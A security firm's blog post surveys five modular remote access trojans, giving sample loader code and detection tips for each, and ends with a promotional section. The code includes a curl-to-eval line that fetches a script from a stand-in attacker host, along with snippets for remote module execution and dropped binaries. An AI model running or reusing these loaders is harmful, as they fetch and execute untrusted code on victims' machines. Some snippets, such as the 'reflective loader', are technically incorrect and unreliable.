Modular Remote Access Trojans (RATs) are fast becoming the preferred toolset for cybercriminals due to their flexibility and adaptability. I’ve seen them evolve from simple backdoors into sophisticated frameworks that can load only the functionality they need at runtime, reducing detection risks and increasing stealth. This makes them more persistent and more dangerous. In this blog, I’ll walk you through five of the most formidable modular RATs active in 2025, show you some of the code-level tricks they use, and share the detection strategies I’ve personally used against them.
Before jumping into the list, let’s quickly clarify what modular RATs are and why they’re different from typical malware strains.
-Book Your FREE Security Consultation Today!
Table of Contents
What Are Modular Remote Access Trojans?
Unlike traditional RATs, modular RATs come with a base payload and download additional modules as needed. This architecture makes them:
Stealthier: Only essential code runs initially.
Flexible: Attackers can swap in new modules without rewriting the whole trojan.
Scalable: The same base RAT can be used for multiple purposes, such as espionage, data theft, ransomware delivery, etc.
Here’s a simplified representation of how a modular RAT works in Python-like pseudocode:
class ModularRAT:
def __init__(self):
self.modules = []
def fetch_module(self, name):
module_code = requests.get(f"http://c2server/modules/{name}.py").text
exec(module_code)
self.modules.append(name)
def run(self):
while True:
task = self.get_command()
self.execute_task(task)
Check out this blog on the TOP Mobile Remote Access Trojans
Let’s look at the top modular RATs that are making waves in 2025.
1. ModPipe v2
Overview: Originally known for targeting point-of-sale systems, ModPipe has evolved into a general-purpose modular RAT. The 2025 version supports encrypted communication, dynamic code loading, and kernel-level rootkits.
Implementation Strategy:
First drops a small loader binary.
Uses encrypted TLS tunnel to pull additional payloads.
Modules written in C++/Rust are injected directly into memory.
Code Walkthrough (Windows DLL Reflective Loader):
HMODULE hMod = LoadLibrary("kernel32.dll");
FARPROC pLoad = GetProcAddress(hMod, "LoadLibraryA");
((void(*)())pLoad)((LPVOID)downloaded_module_bytes);
Detection Tip: Use tools like PE-sieve or Moneta to scan memory for injected code that doesn’t have a backing file. Signature-based detection won’t help here.
2. Octopus RAT
Overview: Octopus RAT is a .NET-based modular RAT that leverages Azure cloud storage to pull modules dynamically. It’s popular in APT campaigns against enterprise networks.
Implementation Strategy:
Initial stager is obfuscated with ConfuserEx.
Retrieves AES-encrypted modules from Azure blobs.
Uses AppDomain.AssemblyResolve to execute modules in memory.
Code Walkthrough:
AppDomain.CurrentDomain.AssemblyResolve += (sender, args) => {
byte[] encryptedBytes = DownloadFromAzure("module.dll.enc");
byte[] dllBytes = Decrypt(encryptedBytes, key);
return Assembly.Load(dllBytes);
};
Detection Tip: Look for custom handlers in AssemblyResolve
and monitor connections to Azure domains from unknown executables.
3. CerberusX
Overview: CerberusX is a RAT built for persistence in Linux environments, especially in containerized workloads. It deploys modules as encrypted shell scripts or ELF binaries.
Implementation Strategy:
Uses cron jobs or systemd services for persistence.
Stores modules in hidden directories and decrypts at runtime.
Communicates over DNS tunneling.
Code Walkthrough (Module loader snippet):
module=$(curl -s http://attacker.com/mod.sh | base64 -d)
eval "$module"
4. NexusCore
Overview: NexusCore is a multi-platform RAT (Windows, macOS, Linux) with a sophisticated modular structure. It supports plugin loading over gRPC and uses protobuf for communication.
Implementation Strategy:
Base binary is written in Golang.
Uses gRPC for C2, encrypted with TLS.
Plugins written in Go, Python, or Lua.
Code Walkthrough:
type Module struct {
Name string
Code []byte
}
func LoadModule(m Module) {
f, _ := os.Create("/tmp/" + m.Name)
f.Write(m.Code)
f.Close()
exec.Command("chmod", "+x", "/tmp/"+m.Name).Run()
exec.Command("/tmp/"+m.Name).Start()
}
Detection Tip: Look for unauthorized binary creation in /tmp
or /var/tmp
. Combine that with telemetry on outbound gRPC traffic to unknown domains.
5. HydraBlade
Overview: HydraBlade is an Android-focused modular RAT that loads payloads from GitHub or Pastebin, using steganography to hide the code.
Implementation Strategy:
Main APK requests camera and storage access.
Pulls modules encoded in images from public repos.
Decodes payload using custom stego-parser.
Code Walkthrough:
Bitmap img = BitmapFactory.decodeStream(new URL(imgUrl).openStream());
String payload = StegoUtils.decode(img);
DexClassLoader loader = new DexClassLoader(payloadPath, optDir, null, getClassLoader());
Class> clazz = loader.loadClass("com.payload.SpyModule");
Detection Tip: Monitor APKs for runtime Dex loading. Any app pulling Dex files from remote sources after install is a red flag.
Final Thoughts
Modular RATs are like the Swiss army knives of cybercrime adaptable, stealthy, and highly effective. Each of the RATs mentioned here showcases just how diverse and powerful these tools have become in 2025.
From containerized environments to Android phones, nothing is off-limits anymore. Defending against them requires more than signature scanning. It demands behavioral monitoring, sandbox analysis, and a proactive approach to hunting down anomalies in your environment.
As attackers continue to refine their modular frameworks, defenders must do the same with detection and response. Keep your tools updated, monitor your network and memory space, and always assume attackers are innovating just as fast as we are.
If you’re tracking a specific RAT eg: Resolver RAT or want help developing detection rules, let’s connect I’m always up for diving into malware guts!
Why Businesses Trust SecureMyOrg for Comprehensive Network Security
At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!







Some of the things people reach out to us for –
- Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, building policies for the company
- Vulnerability Assessment and Penetration Testing ( VAPT ) – We have certified professionals, with certifications like OSCP, CREST – CPSA & CRT, CKA and CKS
- DevSecOps consulting
- Red Teaming activity
- Regular security audits, before product release
- Full time security engineers.
Relevant Posts

Top 5 IoT Remote Access Trojans Crippling Devices in 2025
IoT devices are under siege in 2025 as Remote Access Trojans exploit their vulnerabilities at scale. This blog breaks down the top 5 IoT RATs causing widespread disruption.

Top 5 Web-Based Remote Access Trojans That Are Dominating 2025
Web-based Remote Access Trojans are becoming the go-to tool for cybercriminals in 2025. This post highlights five of the most widespread and dangerous ones currently in use.

Unstoppable Malware: Top 5 Modular Remote Access Trojans Dominating 2025
Modular Remote Access Trojans are evolving fast in 2025, making them harder to detect and remove. This post explores five of the most dangerous RATs currently used in cyberattacks.

Top 5 Mobile Remote Access Trojans Wreaking Havoc in 2025
Uncover the top 5 mobile RATs of 2025, learn how they infect devices, execute attacks, and discover key strategies to detect and stop them effectively.

Top 5 Advanced Persistent Remote Access Trojans (RATs) in 2025
This blog explores five of the most sophisticated Advanced Persistent Remote Access Trojans (AP-RATs) currently active in the cyber threat landscape. We analyze their infection vectors, stealth mechanisms, command-and-control infrastructure, and persistence techniques to help security professionals understand and defend against these high-risk threats.

Top 5 Basic Remote Access Trojans (RATs) You Shouldn’t Ignore in 2025
Remote Access Trojans (RATs) remain a major cybersecurity threat in 2025. Learn about the top 5 basic yet dangerous RATs known for stealthy infiltration, keylogging, and full system control. Learn how they operate and how to defend against them.